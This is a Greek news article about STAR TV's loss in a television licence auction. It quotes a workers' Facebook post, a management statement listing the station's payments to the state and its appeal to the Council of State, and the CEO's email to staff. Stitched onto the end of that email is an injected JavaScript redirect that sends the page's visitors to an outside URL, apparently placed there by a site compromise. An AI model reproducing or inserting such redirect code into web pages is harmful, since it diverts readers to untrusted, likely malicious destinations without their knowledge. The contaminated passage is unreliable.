Οι εργαζόμενοι του STAR: Χωρίς την άδεια σας…. συνεχίζουμε

0
6

Με μια ανάρτηση στο Facebook οι εργαζόμενοι του STAR ξεκαθαρίζουν: Χωρίς την άδεια σας…συνεχίζουμε, εκφράζοντας την οργή τους για τα αποτελέσματα της διαδικασίας της δημοπρασίας των 4 τηλεοπτικών σταθμών.

Την ίδια ώρα σε ανακοίνωση του ο τηλεοπτικός σταθμός κάνει αναφορά στη συνεισφορά του στο Ελληνικό Δημόσιο, αλλά και για την προσφυγή του στο Συμβούλιο της Επικρατείας. Καταγγέλλει τον διαγωνισμό καθώς, μεταξύ άλλων, όπως αναφέρεται χαρακτηριστικά: «δεν ελήφθησαν υπόψη σημαντικές παράμετροι».

Η ανακοίνωση της διοίκησης του STAR έχει ως εξής:

Ο τηλεοπτικός σταθμός STAR αποτελεί μια υγιή Ελληνική επιχείρηση, που λειτουργεί αδιαλείπτως, με νόμιμη άδεια, η οποία ανανεώνεται συνεχώς από το 1993.

Στα χρόνια λειτουργίας του STAR, η Νέα Τηλεόραση έχει συνεισφέρει στο Ελληνικό Δημόσιο:

€ 17.659.309 εκατομμύρια ευρώ για δικαίωμα χρήσης Συχνοτήτων.
€ 156.458.490 εκατομμύρια ευρώ για Ειδικό Φόρο Τηλεόρασης.
€ 118.875.376 εκατομμύρια ευρώ για ΦΠΑ.
€ 87.864.752 εκατομμύρια Ευρώ για άλλους φόρους και Τέλη.
€ 306.117.651 εκατομμύρια ευρώ στα Ασφαλιστικά Ταμεία.
Πέρα από την απόλυτη συνέπεια προς το Ελληνικό Δημόσιο, τα τραπεζικά ιδρύματα, τα ασφαλιστικά ταμεία και τους εργαζόμενούς του, το STAR επενδύει συνεχώς, όλα αυτά τα χρόνια, τόσο σε τεχνολογικό εξοπλισμό και νέες τεχνολογίες, όσο και στο ανθρώπινο δυναμικό, διατηρώντας ποιοτικές θέσεις εργασίας. Μάλιστα, τα τελευταία έξι χρόνια, εν μέσω εξαιρετικά δύσκολης οικονομικής συγκυρίας, οι μέτοχοι του STAR στήριξαν την λειτουργία της επιχείρησης, με ποσό ύψους 85 εκατομμυρίων ευρώ.

Ο διαγωνισμός

Ο διαγωνισμός για τις τηλεοπτικές άδειες προκηρύχθηκε στη βάση μιας αμφιλεγόμενης και ελλιπούς μελέτης, που αυθαίρετα περιόριζε τις προς διάθεση άδειες, χωρίς προειδοποίηση και χωρίς διαβούλευση. Επιπλέον, διεξήχθη σε ένα πλαίσιο τουλάχιστον ασαφές και ιδιότυπο. Για τη συμμετοχή στην εν λόγω διαδικασία, δεν ελήφθησαν υπόψη σημαντικές παράμετροι, όπως η συνεπής νόμιμη λειτουργία, το υφιστάμενο προσωπικό, η ιστορία και η διαδρομή, η τεχνολογική επάρκεια αλλά και οι επενδύσεις, που είχαν πραγματοποιηθεί τα τελευταία χρόνια. Μοναδικό κριτήριο αποτέλεσε η πλειοδοσία ανάμεσα σε υφιστάμενες επιχειρήσεις, που για να συμμετέχουν στη διαδικασία πιστοποιηθήκαν (καταθέτοντας φορολογική, ασφαλιστική και τραπεζική ενημερότητα) και έλαβαν σχετική έγκριση από το ελληνικό δημόσιο και σε νεοσύστατες επιχειρήσεις, που έπρεπε να είναι συνεπείς απλώς και μόνο στην καταβολή μίας εγγυητικής επιστολής.

Τι αποφάσισε η διοίκηση

Σε αυτό το πλαίσιο, έχουμε προσφύγει στο Συμβούλιο της Επικρατείας και θα εξαντλήσουμε κάθε νομική οδό στην Ελλάδα και τους Ευρωπαϊκούς Θεσμούς, προκειμένου να διαφυλάξουμε τα δικαιώματά μας.

Είμαστε απολύτως πεπεισμένοι, έχοντας πλήρη εμπιστοσύνη στην ελληνική δικαιοσύνη, ότι θα τηρηθεί απαρέγκλιτα το γράμμα του νόμου και κάθε τυπική, νόμιμη διαδικασία και παραμένουμε εν αναμονή των σχετικών αποφάσεων.

Το STAR συνεχίζει τη λειτουργία του, έχοντας διανύσει μια διαδρομή 23 ετών, με συνέπεια στο αρχικό όραμα δημιουργίας του, να αποτελέσει μια ηγετική επιχείρηση στην ελληνική αγορά των μέσων μαζικής ενημέρωσης, σεβόμενη πάντοτε τους θεσμούς, τους κανόνες και την επιχειρηματική ηθική.

Στο μεταξύ το Star δια του Διευθύνοντος Συμβούλου του Πάνου Κυριακόπουλου έστειλε mail σε όλους τους εργαζόμενους του καναλιού και τους γνωστοποίησε τις προθέσεις του και τις επόμενες κινήσεις του για τις άδειες.

«Αγαπητοί Συνάδελφοι,

Όπως ασφαλώς γνωρίζετε ο σταθμός μας συμμετείχε στον διαγωνισμό αλλά δεν έλαβε άδεια, παρά το γεγονός ότι βρίσκεται σε λειτουργία 25 χρόνια, απασχολεί 400 άτομα προσωπικό, εχει επενδύσει σε σύγχρονες εγκαταστάσεις, είναι ενήμερος σε όλες του τις υποχρεώσεις του και οι μέτοχοι του τον στήριξαν με € 80 εκ τα χρόνια της κρίσης. Αυτά από ότι φαίνεται δεν μετρήσανε….

Ο σταθμός θεωρεί ότι η όλη διαδικασία που ακολουθήθηκε αντιτίθεται με το Ελληνικό Σύνταγμα, τις αρχές της ελεύθερης οικονομίας, τους κανόνες της Ε.Ε και τις βασικές αρχές της ηθικής. Αρμόδιο όργανο για την αδειοδότηση είναι το ανεξάρτητο ΕΣΡ το οποίο είναι αυτό που θα καθορίσει τον αριθμό των παρόχων περιεχομένου, με βάση τις τεχνικές δυνατότητες της ψηφιακής εποχής, τις αρχές της εξασφάλισης της πολυφωνίας και τα ιδιαίτερα χαρακτηριστικά που έχει η ενημέρωση των πολιτών. Επίσης είναι αυτό που θα υλοποιήσει την διαδικασία αδειοδότησης. Η Ελλάδα είναι το μόνο Ευρωπαϊκό κράτος που ακολούθησε την διαδικασία «όποιος έχει τα χρήματα παίρνει την άδεια»!!

Ο αγώνας από εδώ και πέρα είναι στο Συμβούλιο της Επικρατείας το οποίο θεωρούμε ότι θα επαναφέρει την νομιμότητα.

Το ΣΤΑΡ συνεχίζει να λειτουργεί κανονικά βασιζόμενο στο προσωπικό του και σεβόμενο τους τηλεθεατές του.» setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here